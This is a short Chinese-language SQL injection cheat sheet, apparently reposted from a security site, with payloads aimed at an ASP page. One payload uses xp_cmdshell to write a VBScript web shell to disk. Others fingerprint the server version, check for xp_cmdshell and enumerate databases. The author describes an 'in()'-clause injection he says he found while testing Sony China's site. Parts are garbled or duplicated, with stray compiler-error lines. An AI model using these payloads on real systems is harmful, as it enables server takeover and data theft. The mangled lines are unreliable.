1、http://192.168.1.5/display.asp?keyno=1881execmaster.dbo.xp_cmdshell'echo^<scriptlanguage=VB
1、http://192.168.1.5/display.asp?keyno=1881;exec master.dbo.xp_cmdshell 'echo ^<scr
ipt language=VBScript runat=server^>execute request^("l"^)^</script^> >c:\mu.asp';--
用转义字符来写ASP文件的方法。
2、http://192.168.1.5/display.asp?keyno=188 and 1=(select @@VERSION)
显示SQL系统版本:
Microsoft VBScript 编译器错误 错误 '800a03f6'
缺少 'End'
3、我在检测索尼中国的网站漏洞时,分明已经确定了漏洞存在却无法 在这三种漏洞中找到对应的类型。偶然间我想到了在SQL语言中可以使用“in”关键字进行查询, 例如“select * from mytable where id in(1)”,括号中的值就是我们提交的数据,它的结果与使用
“select *from mytable where id=1”的查询结果完全相同。
所以访问页面的时候在URL后面加上“) and 1=1 and1 in(1) 后原来的SQL语句就变成了“select * from mytable where id in(1) and 1=1 and 1 in(1)”,这样就会出 现期待已久的页面了。 暂且就叫这种类型的漏洞为“包含数字型”吧,聪明的你一定想到了还有“包含字符型”呢。对了,它就是由于类 似 “select * from mytable where name in(‘firstsee’)”的查询语句造成的。
4、http://192.168.1.5/display.asp?keyno=188 and 1=(SELECT count(*) FROM master.dbo.sysobjects WHERE xtype = 'X' AND name = 'xp_cmdshell') 判断xp_cmdshell扩展存储过程是否存在。
5、
向启动组中写入命令行和执行程序
6、http://192.168.1.5/display.asp?keyno=188%20and%200<>db_name() 查看当前的数据库名称Microsoft VBScript 编译器错误 错误 '800a03f6' 缺少 'End'
7、列出当前所有的数据库名称:select * from master.dbo.sysdatabases
本站技术原创栏目文章均为中睿原创或编译,转载请注明:文章来自中睿,本站保留追究责任的权利。